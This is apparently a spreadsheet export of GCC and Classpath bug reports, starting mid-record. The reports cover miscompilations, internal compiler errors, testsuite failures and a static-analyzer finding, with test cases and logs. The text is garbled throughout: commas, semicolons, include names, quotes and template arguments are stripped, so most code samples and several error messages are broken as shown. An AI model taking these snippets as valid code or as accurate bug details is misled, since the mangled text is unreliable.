11/./libgfortran/ /test/gnu/gcc/gcc/gcc/testsuite/gfortran.dg/g77/f90-intrinsic-bit.f -fno-diagnostics-show-caret -Os -pedantic-errors -B/test/gnu/gcc/objdir/hppa2.0w-hp-hpux11.11/./libgfortran/.libs -L/test/gnu/gcc/objdir/hppa2.0w-hp-hpux11.11/./libgfortran/.libs -L/test/gnu/gcc/objdir/hppa2.0w-hp-hpux11.11/./libgfortran/.libs -B/test/gnu/gcc/objdir/hppa2.0w-hp-hpux11.11/./libquadmath/.libs -L/test/gnu/gcc/objdir/hppa2.0w-hp-hpux11.11/./libquadmath/.libs -L/test/gnu/gcc/objdir/hppa2.0w-hp-hpux11.11/./libquadmath/.libs -lm -o ./f90-intrinsic-bit.exePASS: gfortran.dg/g77/f90-intrinsic-bit.f  -Os  (test for excess errors)
Setting LD_LIBRARY_PATH to .:/test/gnu/gcc/objdir/hppa2.0w-hp-hpux11.11/./libgfortran/.libs:/test/gnu/gcc/objdir/hppa2.0w-hp-hpux11.11/./libgfortran/.libs:/test
/gnu/gcc/objdir/hppa2.0w-hp-hpux11.11/./libquadmath/.libs:/test/gnu/gcc/objdir/hppa2.0w-hp-hpux11.11/./libquadmath/.libs:/test/gnu/gcc/objdir/gcc:.:/test/gnu/gcc/objdir/hppa2.0w-hp-hpux11.11/./libgfortran/.libs:/test/gnu/gcc/objdir/hppa2.0w-hp-hpux11.11/./libgfortran/.libs:/test/gnu/gcc/objdir/hppa2.0w-hp-hpux11.11/./libquadmath/.libs:/test/gnu/gcc/objdir/hppa2.0w-hp-hpux11.11/./libquadmath/.libs:/test/gnu/gcc/objdir/gcc
spawn [open ...]
Test BIT_SIZE(integer(8)) FAILED
 Got                    64  expected                     0
Backtrace for this error:
#0  0xC1C39DDB
FAIL: gfortran.dg/g77/f90-intrinsic-bit.f  -Os  execution test
Expected value seems wrong...</t>
  </si>
  <si>
    <t>GCC-63605</t>
  </si>
  <si>
    <t>[4.8 Regression] wrong code at -O3 on x86_64-linux-gnu</t>
  </si>
  <si>
    <t>The current gcc trunk (as well as 4.8.x and 4.9.x) miscompiles the following code on x86_64-linux at -O3 in both 32-bit and 64-bit modes.  
This is a regression from 4.7.x. 
The miscompilation seems to be caused by the tree vectorizer as -fno-tree-vectorize makes it disappear. 
$ gcc-trunk -v
Using built-in specs.
COLLECT_GCC=gcc-trunk
COLLECT_LTO_WRAPPER=/usr/local/gcc-trunk/libexec/gcc/x86_64-unknown-linux-gnu/5.0.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ../gcc-trunk/configure --prefix=/usr/local/gcc-trunk --enable-languages=cc++ --disable-werror --enable-multilib
Thread model: posix
gcc version 5.0.0 20141018 (experimental) [trunk revision 216429] (GCC) 
$ gcc-trunk -O2 small.c a.out
1
$ gcc-4.7 -O3 small.c a.out
1
$ 
$ gcc-trunk -O3 small.c a.out
0
$ 
--------------------------------
int printf (const char * ...)
int a b[8] = { 2 0 0 0 0 0 0 0 } c[8]
int
main ()
{
  int d
  for ( a &lt; 8 a++)
    {
      d = b[a] &gt;&gt; 1
      c[a] = d != 0
    }
  printf (%d\n c[0])
  return 0
}</t>
  </si>
  <si>
    <t>GCC-80063</t>
  </si>
  <si>
    <t>gcc/asan.c: PVS-Studio: Incorrect Block Delimitation (CWE-483)</t>
  </si>
  <si>
    <t>We have found a weakness (CWE-483) using PVS-Studio tool. PVS-Studio is a static code analyzer for C C++ and C#: https://www.viva64.com/en/pvs-studio/
Analyzer warning: V640 The code's operational logic does not correspond with its formatting. The second statement will always be executed. It is possible that curly brackets are missing. asan.c 2582
void initialize_sanitizer_builtins (void)
{
  ....
  #define DEF_SANITIZER_BUILTIN(ENUM NAME TYPE ATTRS) \
  decl = add_builtin_function (__builtin_ NAME TYPE ENUM		\
			       BUILT_IN_NORMAL NAME NULL_TREE)	\
  set_call_expr_flags (decl ATTRS)					\
  set_builtin_decl (ENUM decl true)
  #include sanitizer.def
  /* -fsanitize=object-size uses __builtin_object_size but that might
     not be available for e.g. Fortran at this point.  We use
     DEF_SANITIZER_BUILTIN here only as a convenience macro.  */
  if ((flag_sanitize &amp; SANITIZE_OBJECT_SIZE)
      &amp;&amp; !builtin_decl_implicit_p (BUILT_IN_OBJECT_SIZE))
    DEF_SANITIZER_BUILTIN (BUILT_IN_OBJECT_SIZE object_size         // &lt;=
			   BT_FN_SIZE_CONST_PTR_INT
			   ATTR_PURE_NOTHROW_LEAF_LIST)
  ....
}
The conditional operator covers only the first expression of the macro the other two expressions will always be executed. Perhaps this is a mistake the macro should be enclosed in braces.</t>
  </si>
  <si>
    <t>khandeliants</t>
  </si>
  <si>
    <t>GCC-24583</t>
  </si>
  <si>
    <t>[4.0 only] InetAddress.getLocalHost() returns broken InetAddress object when local hostname cannot be resolved</t>
  </si>
  <si>
    <t>When a Java program is run in a chroot environment on Linux InetAddress.getLocalHost() returns a broken InetAddress object (broken in the same way as it was in bug 17069).
Test case:
import java.net.InetAddress
import java.net.UnknownHostException
public class TestAddr {
        public static void main (String args []) throws UnknownHostException {
                InetAddress.getLocalHost ().getAddress ()
        }
} // end of class TestAddr
The test case prints this inside the chroot:
Exception in thread main java.lang.NullPointerException
   at java.net.InetAddress.getAddress() (/usr/lib/libgcj.so.6.0.0)
   at TestAddr.main(java.lang.String[]) (Unknown Source)
   at gnu.java.lang.MainThread.call_main() (/usr/lib/libgcj.so.6.0.0)
   at gnu.java.lang.MainThread.run() (/usr/lib/libgcj.so.6.0.0)
and nothing when not in a chroot.
By using LD_LIBRARY_PATH I have verified that the brokenness _is_ triggered by the chroot not by the different versions of libc and libgcj that are dynamically linked against when inside the chroot:
bash-3.00$ LD_LIBRARY_PATH=/mnt/rawhide/usr/lib:/mnt/rawhide/lib ldd /mnt/rawhide/home/greenrd/testaddr
        linux-gate.so.1 =&gt;  (0xffffe000)
        libgcc_s.so.1 =&gt; /mnt/rawhide/lib/libgcc_s.so.1 (0x00db1000)
        libgcj.so.6 =&gt; /mnt/rawhide/usr/lib/libgcj.so.6 (0x02000000)
        libm.so.6 =&gt; /mnt/rawhide/lib/libm.so.6 (0x00354000)
        libpthread.so.0 =&gt; /mnt/rawhide/lib/libpthread.so.0 (0x00390000)
        libz.so.1 =&gt; /mnt/rawhide/usr/lib/libz.so.1 (0x0037b000)
        libdl.so.2 =&gt; /mnt/rawhide/lib/libdl.so.2 (0x0034e000)
        libc.so.6 =&gt; /mnt/rawhide/lib/libc.so.6 (0xf7ed1000)
        /lib/ld-linux.so.2 (0x00248000)
bash-3.00$ LD_LIBRARY_PATH=/mnt/rawhide/usr/lib:/mnt/rawhide/lib /mnt/rawhide/home/greenrd/testaddr
bash-3.00$
The real /dev /proc and /sys are mounted inside the chroot and /sbin/ifconfig can see all the network interfaces and their IPs when run as the same user from inside the chroot so it is not the case that the kernel is hiding this information.</t>
  </si>
  <si>
    <t>GCC-60871</t>
  </si>
  <si>
    <t>[4.9 Regression] internal compiler error: in possible_polymorphic_call_targets at ipa-devirt.c:1510</t>
  </si>
  <si>
    <t>Following code throws an internal compiler error with g++-4.9 -O2
$ g++ -O2 -c tst.c
tst.c: In static member function â€˜static void C11::comp()â€™:
tst.c:88:1: internal compiler error: in possible_polymorphic_call_targets at ipa-devirt.c:1510
 }
 ^
0x9e77a8 possible_polymorphic_call_targets(tree_node* long ipa_polymorphic_call_context bool* void** int*)
	../../gcc/ipa-devirt.c:1510
0x9a3b67 possible_polymorphic_call_targets(tree_node* bool* void**)
	../../gcc/ipa-utils.h:142
0x9a0d56 gimple_fold_call
	../../gcc/gimple-fold.c:1126
0x9a0d56 fold_stmt_1
	../../gcc/gimple-fold.c:1239
0xbbc5b9 fold_marked_statements
	../../gcc/tree-inline.c:4541
0xbc9b54 optimize_inline_calls(tree_node*)
	../../gcc/tree-inline.c:4622
0x10639b9 early_inliner
	../../gcc/ipa-inline.c:2303
0x10639b9 execute
	../../gcc/ipa-inline.c:2366
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
Source:
void *vptr
class C2
{
public:
  static inline C2 * cbss()
  {
    singleton = (C2 *)vptr
    return singleton
  }
private:
  static C2 * singleton
}
class C3
{
public:
  C3(void) {}
  virtual void sf()
protected:
  unsigned m_local:1
}
class C4 : virtual public C3
{
public:
 C4(void) : C3() {}
protected:
  void sf() { }
  void uf() { }
}
class C5
{
private:
  C3 * m_g
public:
  C5(C3 * g) : m_g(g)  { m_g-&gt;sf() }
}
class C6
{
public:
  virtual ~C6() {}
}
class C7 : public C6
{
protected:
  C7(void) {}
}
class C8 : public C4 public C7
{
public:
 C8(void) : C3() C4() C7() { }
}
class C9 : public C8
{
public:
 C9(void) : C3() C8() { }
}
class C10 : public C9
{
protected:
 C10(void) : C3() C9() { }    
}
class C11 : public C10
{
protected:
 C11( const C2 * s ) : C3() C10() { }
public:
  static void comp(void)
  {
    C11 a(C2::cbss())
    C5 uf(
  }
}
void foo (void)
{
  C11::comp()
}</t>
  </si>
  <si>
    <t>GCC-40129</t>
  </si>
  <si>
    <t>M16C invalid shift count used by pack_d -&gt; ashldi3</t>
  </si>
  <si>
    <t>some disasm listings to show what is going wrong..
i cant find the guilty source files:-(
000fa8b2 :
fadb7:   75 42           push.w:g r2    //pushing 64 bit exponent [63:48]
fadb9:   75 42           push.w:g r2    //pushing 64 bit exponent [47:32]
fadbb:   75 42           push.w:g r2    //pushing 64 bit exponent [31:16]
fadbd:   75 40           push.w:g r0    //pushing 64 bit exponent [15:0]
fadbf:   75 c2 34 00     mov.w:g #52r2 //shift count to get exponent in [62:52]
fadc3:   fd 83 6f 0f     jsr.a f6f83 
___ashldi3 detects that it needs to shift more then 32 bits and prepares to shift by -(32-52) = 20 bits (and after that 'shift' by 32 by moving registers around)
000f6f83 :
f7055:   73 b2 07        mov.w:g 7[fb]r2     //src bit[15:0]
f7058:   73 b0 05        mov.w:g 5[fb]r0     //src bit[31:16]
f705b:   72 b2 e2        mov.b:g -30[fb]r1l  //shift count (20)
f705e:   72 23           mov.b:g r1lr1h      //shift count (20)
f7060:   eb 21           sha.l r1hr2r0       //the shift
The M16C/60 M16C/20 M16C/Tine Series Software Manual says:
If src is a register and you selected (.W) or (.L) for
 the size specifier (.size) the number of shifts 
 is â€“16 to +16. Although you can set 0 no bits are shifted and
 no flags are changed. If you set a value less than â€“16 or 
 greater than +16 the result of shift is indeterminate.
the actual result on my hardware is a shift by 4 (20 &amp; 0xf).
i think ___ashldi3 (and friends!)
should (also) check if the shift is &gt;16 
and only do the shift % 16 with the shift instruction and do the rest of the shift by moving registers.</t>
  </si>
  <si>
    <t>eightdot</t>
  </si>
  <si>
    <t>GCC-38430</t>
  </si>
  <si>
    <t>[4.4 Regression]: gfortran.dg/streamio_1.f90 10 14 2 6 now fails</t>
  </si>
  <si>
    <t>With revision 142513 these test passed.
From revision 142516 and on these tests have failed as follows
(together with related tests:
Running /tmp/hpautotest-gcc1/gcc/gcc/testsuite/gfortran.dg/dg.exp ...
...
FAIL: gfortran.dg/streamio_1.f90  -O0  execution test
FAIL: gfortran.dg/streamio_10.f90  -O0  execution test
FAIL: gfortran.dg/streamio_14.f90  -O0  execution test
FAIL: gfortran.dg/streamio_14.f90  -O1  execution test
FAIL: gfortran.dg/streamio_16.f90  -O0  execution test
FAIL: gfortran.dg/streamio_2.f90  -O0  execution test
FAIL: gfortran.dg/streamio_6.f90  -O0  execution test
FAIL: gfortran.dg/streamio_8.f90  -O0  execution test
With the messages in the logfile being all similar:
PASS: gfortran.dg/streamio_1.f90  -O0  (test for excess errors)
At line 13 of file /tmp/hpautotest-gcc1/gcc/gcc/testsuite/gfortran.dg/streamio_1.f90 (unit = 11 file = 'fort.11')^M
Fortran runtime error: POS=specifier too large^M
FAIL: gfortran.dg/streamio_1.f90  -O0  execution test
Remember this is one of those targets with no truncation support
(neither ftruncate nor chsize).  Is that related?
(Not evident by a glance at streamio_1.f90 but perhaps the library itself does.)
Is this perhaps due to lack of some other support?  Looks very much seek-related.
Author of suspect patches in the revision range CC:ed but I'll assign myself this PR while I investigate whether there's a deficiency in the (l)seek support of this target particularly with -D_FILE_OFFSET_BITS=64.</t>
  </si>
  <si>
    <t>GCC-54891</t>
  </si>
  <si>
    <t>[C++11] lambda-expression and explicit type conversion (cast notation)</t>
  </si>
  <si>
    <t>Created attachment 28413
Output of -v option and preprocessed file
The following valid code is rejected by GCC 4.8.0 20121007 4.7.3 20121006 and 4.6.4 20121005.
/////////////
int main()
{
  (void)[]{}
}
/////////////
For the above code GCC 4.8.0 20121007 says
main.cpp: In function 'int main()':
main.cpp:3:4: error: expected primary-expression before 'void'
   (void)[]{}
    ^
main.cpp:3:4: error: expected ')' before 'void'</t>
  </si>
  <si>
    <t>CLASSPATH-38664</t>
  </si>
  <si>
    <t>classpath/include/jvmti.h:1242: warning: cannot pass objects of non-POD type 'struct va_list' through '...'</t>
  </si>
  <si>
    <t>This warning is the cause of several FAILs for libjava testsuite on alphaev56-unknown-linux-gnu [1]:
FAIL: natgetargssize.cc compilation
FAIL: natgetlocalvartable.cc compilation
FAIL: natgetstacktrace.cc compilation
FAIL: natevents.cc compilation
FAIL: natgetallthreads.cc compilation
FAIL: natgeterrorname.cc compilation
FAIL: natgetmethodname.cc compilation
These tests all fail during compile with following message:
In file included from /home/uros/gcc-svn/trunk/libjava/testsuite/libjava.jvmti/interp/natgetargssize.cc:3:
/home/uros/gcc-svn/trunk/libjava/testsuite/../classpath/include/jvmti.h: In member function 'jvmtiError _Jv_JVMTIEnv::SetEventNotificationMode(jvmtiEventMode jvmtiEvent __jobject* ...)':
/home/uros/gcc-svn/trunk/libjava/testsuite/../classpath/include/jvmti.h:1242: warning: cannot pass objects of non-POD type 'struct va_list' through '...' call will abort at runtime
output is:
In file included from /home/uros/gcc-svn/trunk/libjava/testsuite/libjava.jvmti/interp/natgetargssize.cc:3:
/home/uros/gcc-svn/trunk/libjava/testsuite/../classpath/include/jvmti.h: In member function 'jvmtiError _Jv_JVMTIEnv::SetEventNotificationMode(jvmtiEventMode jvmtiEvent __jobject* ...)':
/home/uros/gcc-svn/trunk/libjava/testsuite/../classpath/include/jvmti.h:1242: warning: cannot pass objects of non-POD type 'struct va_list' through '...' call will abort at runtime
FAIL: natgetargssize.cc compilation
The relevant part of jvmti.h reads:
--cut here--
  jvmtiError SetEventNotificationMode (jvmtiEventMode mode
				       jvmtiEvent event_type
				       jthread event_thread ...)
  {
    va_list args
    va_start (args event_thread)
    jvmtiError result = p-&gt;SetEventNotificationMode (this mode event_type
						     event_thread args)
    va_end (args)
    return result
  }
--cut here--
[1] http://gcc.gnu.org/ml/gcc-testresults/2008-12/msg02551.html</t>
  </si>
  <si>
    <t>GCC-2007</t>
  </si>
  <si>
    <t>gcc has a segmentation fault with defines</t>
  </si>
  <si>
    <t>declaring an array of size X where X has not been defined
causes gcc to give a segmentation fault
Release:
version 2.96 20000731 (Red Hat Linux 7.0)
Environment:
Linux kernel 2.4.0 on i686
How-To-Repeat:
#include 
void *n[N]=
{
    NULL
    NULL
    NULL
    NULL
    NULL
}
main()
{
	printf(hello world\n)
}</t>
  </si>
  <si>
    <t>siva</t>
  </si>
  <si>
    <t>GCC-39035</t>
  </si>
  <si>
    <t>if( 0.0DF ) is considered true</t>
  </si>
  <si>
    <t>Using gcc 4.3.2-7 on Intel Pentium 4 running Fedora Core 10 and -std=gnu99 of
/* DFP TR 24732 == WG14 / N1176 N1312 */
#define __STDC_WANT_DEC_FP__ /* Tell implementation that we want Decimal FP */
#include 	/* printf() */
int main(void){
  if( 0.0DF ){
    printf(0.0DF should be zero\n)
  }
  return 0
}
gets:
0.0DF should be zero</t>
  </si>
  <si>
    <t>GCC-59004</t>
  </si>
  <si>
    <t>[4.8 Regression] ICE generated by __func__</t>
  </si>
  <si>
    <t>Created attachment 31159
Preprocessed source
This minimal example causes GCC to ICE:
template class A {}
template
class B {
public:
    static const int y = (x != -1 ? 0 : 0)
    template void g(const A &amp;a) {
        const char *x = __func__
    }
}
template void B::g(const A 
Error message when compiling with g++ -c ice_func.cpp:
ice_func.cpp: In member function â€˜void B::g(const A::y&gt; int x = 0]â€™:
ice_func.cpp:9:25: internal compiler error: Segmentation fault
         const char *x = __func__
                         ^
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Preprocessed source stored into /tmp/ccseXGe8.out file please attach this to your bugreport.
GCC info:
Using built-in specs.
COLLECT_GCC=g++
COLLECT_LTO_WRAPPER=/usr/lib/gcc/x86_64-linux-gnu/4.8/lto-wrapper
Target: x86_64-linux-gnu
Configured with: ../src/configure -v --with-pkgversion='Ubuntu/Linaro 4.8.1-10ubuntu8' --with-bugurl=file:///usr/share/doc/gcc-4.8/README.Bugs --enable-languages=cc++javagodfortranobjcobj-c++ --prefix=/usr --program-suffix=-4.8 --enable-shared --enable-linker-build-id --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --with-gxx-include-dir=/usr/include/c++/4.8 --libdir=/usr/lib --enable-nls --with-sysroot=/ --enable-clocale=gnu --enable-libstdcxx-debug --enable-libstdcxx-time=yes --enable-gnu-unique-object --enable-plugin --with-system-zlib --disable-browser-plugin --enable-java-awt=gtk --enable-gtk-cairo --with-java-home=/usr/lib/jvm/java-1.5.0-gcj-4.8-amd64/jre --enable-java-home --with-jvm-root-dir=/usr/lib/jvm/java-1.5.0-gcj-4.8-amd64 --with-jvm-jar-dir=/usr/lib/jvm-exports/java-1.5.0-gcj-4.8-amd64 --with-arch-directory=amd64 --with-ecj-jar=/usr/share/java/eclipse-ecj.jar --enable-objc-gc --enable-multiarch --disable-werror --with-arch-32=i686 --with-abi=m64 --with-multilib-list=m32m64mx32 --with-tune=generic --enable-checking=release --build=x86_64-linux-gnu --host=x86_64-linux-gnu --target=x86_64-linux-gnu
Thread model: posix
gcc version 4.8.1 (Ubuntu/Linaro 4.8.1-10ubuntu8)</t>
  </si>
  <si>
    <t>GCC-7849</t>
  </si>
  <si>
    <t>libstdc++.so: undefined reference to std::messages::do_get[...] causes failure during building of abi_check</t>
  </si>
  <si>
    <t>For the last 2 days I have been unable to fully bootstrap the cvs HEAD sources.  Each time I build from a clean build dir it fails when trying to build abi_check in libstdc++.  Specifically g++ complains: [...]/libstdc++-v3/src/.libs/libstdc++.so: undefined reference to `std::messages::do_get(int int int std::basic_string std::allocator &gt; const&amp;) const'
Release:
20020907
Environment:
2.4.19-rc1-ac3-gentoo-r1 #3 Mon Aug 5 05:59:51 EDT 2002 i686 Pentium III (Katmai) GenuineIntel GNU/Linux
GNU ld version 2.13.90.0.4 20020814
glibc-2.2.5
How-To-Repeat:
This is the configuration arguments I use to build the gcc suite:
CFLAGS=-march=pentium3 -mfpmath=sse -mmmx -msse -pipe \
CXXFLAGS=-march=pentium3 -mfpmath=sse -mmmx -msse -pipe -Wno-deprecated \
../gcc/configure  --build=i686-pc-linux-gnu --host=i686-pc-linux-gnu --target=i686-pc-linux-gnu --prefix=/usr --srcdir=../../gcc/gcc --mandir=/usr/share/man --infodir=/usr/share/info --program-suffix=-3.3 --with-gcc-version-trigger=/usr/src/gcc/gcc/gcc/version.c --with-system-zlib --with-gxx-include-dir=/usr/include/g++-v33 --with-local-prefix=/usr/local --with-x --without-included-gettext --enable-shared --enable-languages=cc++adaf77objcjava --enable-threads=posix --enable-long-long --enable-objc-gc --enable-cstdio=stdio --enable-clocale=generic --enable-__cxa_atexit --enable-version-specific-runtime-libs --enable-shared --enable-interpreter --enable-nls --disable-checking
Run 'make bootstrap' from TLD of build dir after configuring.</t>
  </si>
  <si>
    <t>nwourms</t>
  </si>
  <si>
    <t>GCC-2514</t>
  </si>
  <si>
    <t>Inlining not done for simple function</t>
  </si>
  <si>
    <t>By compiling with g++ -O2 -finline-functions the following
code snippet by Bulka &amp; Mayhew the very simple function
calc is not inlined (as assessed by comparing with object
code and runtime behavior to the g++ -O2 case).
-----------
#include 
int calc(int a int b)
{
  return a+b
}
int main()
{
  int x[1000]
  int y[1000]
  int z[1000]
  for (int i=0 i&lt;1000 ++i) {
    for (int j=0 j&lt;1000 ++j) {
      for (int k=0 k&lt;1000 ++k) {
	z[i]=calc(y[j] x[k])
      }
    }
  }
}
Release:
3.1 20010408
Environment:
i686 Linux2.2.19 Glibc2.2.2 Binutils 2.11
How-To-Repeat:
The last time I checked a couple fo weeks ago the
function was indeed inlined (as is by 2.95.2 - this is a
performance regression).</t>
  </si>
  <si>
    <t>GCC-13870</t>
  </si>
  <si>
    <t>template with type and function templated on type causes segfault.</t>
  </si>
  <si>
    <t>g++ segfaults on a templated class where the template is of
a particular form (see below)
Environment:
System: Linux razorfish 2.4.22-1-686 #6 Sat Oct 4 14:09:08 EST 2003 i686 GNU/Linux
Architecture: i686
host: i486-pc-linux-gnu
build: i486-pc-linux-gnu
target: i486-pc-linux-gnu
configured with: ../src/configure -v --enable-languages=cc++javaf77pascalobjcadatreelang --prefix=/usr --mandir=/usr/share/man --infodir=/usr/share/info --with-gxx-include-dir=/usr/include/c++/3.3 --enable-shared --with-system-zlib --enable-nls --without-included-gettext --enable-__cxa_atexit --enable-clocale=gnu --enable-debug --enable-java-gc=boehm --enable-java-awt=xlib --enable-objc-gc i486-linux
How-To-Repeat:
Try to compile these three lines with
g++ foo.cc -c
------------------------------------------------------------
template () &gt;
class Bar {
}
------------------------------------------------------------
You will see
foo.cc:3: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>jhbrown</t>
  </si>
  <si>
    <t>GCC-52400</t>
  </si>
  <si>
    <t>[4.6 Regression] lto1: ICE with extern on static linkage</t>
  </si>
  <si>
    <t>Compiling the attached file
g++ -O0  -flto foo.cc
lto1: internal compiler error: in lto_record_renamed_decl at lto-section-in.c:330
removing the external declaration for f4() makes the test pass.</t>
  </si>
  <si>
    <t>GCC-25765</t>
  </si>
  <si>
    <t>gfortran.dg/assign_2.f90 -O0 fails</t>
  </si>
  <si>
    <t>gfortran.dg/assign_2.f90 at -O0 fails because the subtraction between labels in different sections cannot be done well it is really the last label is not in the same section when it should be as there is no nop after the last label.
we get something like:
L00000000001$pb:
L6:
        popl    %ebx
        leal    _j.0.799-L00000000001$pb(%ebx) %eax
        movl    $-1 (%eax)
        leal    _j.1.800-L00000000001$pb(%ebx) %edx
        leal    L2-L00000000001$pb(%ebx) %eax
....
        leave
        ret
L2:  // &lt;--- there should be a nop here.
        .data
        .align 2
_j.0.799:</t>
  </si>
  <si>
    <t>langton</t>
  </si>
  <si>
    <t>CLASSPATH-24360</t>
  </si>
  <si>
    <t>Frame.getX() and getY() should report actual on-screen position</t>
  </si>
  <si>
    <t>java.awt.Frame.getX() and getY() should return the actual on-screen position
of the Frame. That is those values must be updated when the window is moved
by the user or by the window-manager (e.g. twm with autoplacement on).
I suspect that the problem also affect Window and Dialog but I didn't 
test that (yet).
At least on my system (tested with four windowmanagers) classpath cvs 
(2005.10.13) always returns the value from the last setLocation(xy) call
and the default value of (00) when setLocation() has never been called.
The values are NOT updated when the window is moved by the user.
Run attached testcase and click the button to see the values reported by
getX()/getY() and getLocationOnScreen(). The reference implementation updates
the getX()/getY() values when the window is moved (or resized) while
classpath does not.</t>
  </si>
  <si>
    <t>GCC-77550</t>
  </si>
  <si>
    <t>[6/7 Regression] std::deque with -O3 has infinite std::distance</t>
  </si>
  <si>
    <t>The following program compiled with -O3 never returns:
#include 
#include 
#include 
#include 
#include 
struct Foo
{
    std::string bar s = 
    char a = '\0'
}
int main()
{
    const std::deque foos(14 {})
    const std::string test {}
    const auto p = [test] (const auto }
    using boost::make_filter_iterator
    const auto begin = make_filter_iterator(p std::cbegin(foos) std::cend(foos))
    const auto end   = make_filter_iterator(p std::cend(foos) std::cend(foos))
    std::cout &lt;&lt; std::distance(begin end) &lt;&lt; std::endl
}
Observations:
 - GCC with optimisations -O2 or less returns as expected.
 - Clang (3.8) returns the correct answer with any optimisation level.
 - Changing std::deque to std::vector or std::list results in expected behaviour.
 - The 14 is critical anything less and the problem disappears.
 - The sizeof(Foo) is important removing s or a makes the problem go away.
 - Capturing test by reference or just comparing to a constant expression (e.g. foo.bar ==  ) results in normal behaviour.
 - There are no compiler warnings (with -Wall -Wextra -pedantic).
 - Valgrind reports no errors.
 - Use fsanitize=undefined and the problem goes away.
From: http://stackoverflow.com/q/39424753/2970186</t>
  </si>
  <si>
    <t>dan.cooke89</t>
  </si>
  <si>
    <t>GCC-44549</t>
  </si>
  <si>
    <t>[OOP][F2008] Type-bound procedure: bogus error from list after PROCEDURE</t>
  </si>
  <si>
    <t>After the fix for pr40117 with r160646 the following code (borrowed from somewhere)
MODULE rational_numbers
  IMPLICIT NONE
  PRIVATE
  TYPEPUBLIC :: rational
    PRIVATE
    INTEGER nd
    CONTAINS
    ! ordinary type-bound procedure
    PROCEDURE :: real =&gt; rat_to_real
    ! specific type-bound procedures for generic support
    PROCEDUREPRIVATE :: rat_asgn_i rat_plus_rat rat_plus_i
    PROCEDUREPRIVATEPASS(b) :: i_plus_rat
    ! generic type-bound procedures
    GENERIC :: ASSIGNMENT(=) =&gt; rat_asgn_i
    GENERIC :: OPERATOR(+) =&gt; rat_plus_rat rat_plus_i i_plus_rat
  END TYPE
  CONTAINS
    ELEMENTAL REAL FUNCTION rat_to_real(this) RESULT(r)
      CLASS(rational)INTENT(IN) :: this
      r = REAL(this%n)/this%d
    END FUNCTION
    ELEMENTAL SUBROUTINE rat_asgn_i(ab)
      CLASS(rational)INTENT(OUT) :: a
      INTEGERINTENT(IN) :: b
      a%n = b
      a%d = 1
    END SUBROUTINE
    ELEMENTAL TYPE(rational) FUNCTION rat_plus_i(ab) RESULT(r)
      CLASS(rational)INTENT(IN) :: a
      INTEGERINTENT(IN) :: b
      r%n = a%n + b*a%d
      r%d = a%d
    END FUNCTION
    ELEMENTAL TYPE(rational) FUNCTION i_plus_rat(ab) RESULT(r)
      INTEGERINTENT(IN) :: a
      CLASS(rational)INTENT(IN) :: b
      r%n = b%n + a*b%d
      r%d = b%d
    END FUNCTION
    ELEMENTAL TYPE(rational) FUNCTION rat_plus_rat(ab) RESULT(r)
      CLASS(rational)INTENT(IN) :: ab
      r%n = a%n*b%d + b%n*a%d
      r%d = a%d*b%d
    END FUNCTION
END
gives the following bogus error:
class_test.f90:31.48:
    ELEMENTAL TYPE(rational) FUNCTION rat_plus_i(ab) RESULT(r)
                                                1
Error: Assignment operator interface at (1) must be a SUBROUTINE
and gives an ICE when compiled with -std=f2003
class_test.f90:12.49:
    PROCEDUREPRIVATE :: rat_asgn_i rat_plus_rat rat_plus_i
                                                 1
Error: Fortran 2008: PROCEDURE list at (1)
class_test.f90:16.29:
    GENERIC :: OPERATOR(+) =&gt; rat_plus_rat rat_plus_i i_plus_rat
                             1
Error: Undefined specific binding 'rat_plus_i' as target of GENERIC '+' at (1)
f951: internal compiler error: Segmentation fault</t>
  </si>
  <si>
    <t>GCC-48216</t>
  </si>
  <si>
    <t>[4.7 regression] IRIX 6 Ada bootstrap broken: gnu_decl uninitialized in gcc-interface/decl.c:elaborate_expression_1</t>
  </si>
  <si>
    <t>As of rev 171156 Ada bootstrap is broken on IRIX 6.5:
/vol/gcc/src/hg/trunk/local/gcc/ada/gcc-interface/decl.c: In function 'elaborate_expression_1':
/vol/gcc/src/hg/trunk/local/gcc/ada/gcc-interface/decl.c:6008:8: error: 'gnu_decl' may be used uninitialized in this function [-Werror=uninitialized]</t>
  </si>
  <si>
    <t>GCC-69872</t>
  </si>
  <si>
    <t>[6/7 Regression] -Wnarrowing note without warning/errror</t>
  </si>
  <si>
    <t>struct s { int x y }
short offsets[1] = {
  ((char*) &amp;(((struct s*)16)-&gt;y) - (char *)16) // { dg-message narrowing  { target c++11 } }
}
$ g++ prog.cc -Wall -Wextra -std=gnu++1z -pedantic -Wno-narrowing
prog.cc:3:34: note:  the expression has a constant value but is not a C++ constant-expression
   ((char*) &amp;(((struct s*)16)-&gt;y) - (char *)16) // { dg-message narrowing  { target c++11 } }
   ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~^~~~~~~~~~~~~</t>
  </si>
  <si>
    <t>GCC-35792</t>
  </si>
  <si>
    <t>Illegal program not detected RM 3.10.1(4/2)</t>
  </si>
  <si>
    <t>If an incomplete_type_declaration includes the reserved word tagged
then a full_type_declaration that completes it shall declare a tagged
type.
The error for T3 is detected but not T1 or T2.
package pak1 is
   type T1 is tagged
   type T2 is tagged
   type T3 is tagged
   protected type T1 is end T1
   task type T2
   type T3 is null record
end pak1
gnatmake -gnat05 pak1
gcc-4.1 -c -gnat05 pak1.ads
pak1.ads:4:09: full declaration of type T3 defined at line 7 must be tagged
gnatmake -gnat05 pak1
gcc-4.3 -c -gnat05 pak1.ads
pak1.ads:4:09: full declaration of type T3 defined at line 7 must be tagged</t>
  </si>
  <si>
    <t>GCC-60391</t>
  </si>
  <si>
    <t>[c++1y] ICE with auto parameter for operator</t>
  </si>
  <si>
    <t>The following invalid code snippet (compiled with -std=c++1y) triggers
an ICE on trunk:
===========================================
namespace N
{
  int operator _X(auto) {}
}
namespace N {}
===========================================
bug.cc:3:25: error: 'int N::operator_X(auto:1)' has invalid argument list
   int operator _X(auto) {}
                         ^
bug.cc:6:13: internal compiler error: in resume_scope at cp/name-lookup.c:1656
 namespace N {}
             ^
0x77fc2e resume_scope
        ../../gcc/gcc/cp/name-lookup.c:1656
0x78aa0c push_namespace(tree_node*)
        ../../gcc/gcc/cp/name-lookup.c:3717
0x6d9154 cp_parser_namespace_definition
        ../../gcc/gcc/cp/parser.c:15771
0x6da3b1 cp_parser_declaration
        ../../gcc/gcc/cp/parser.c:10971
0x6d8fa8 cp_parser_declaration_seq_opt
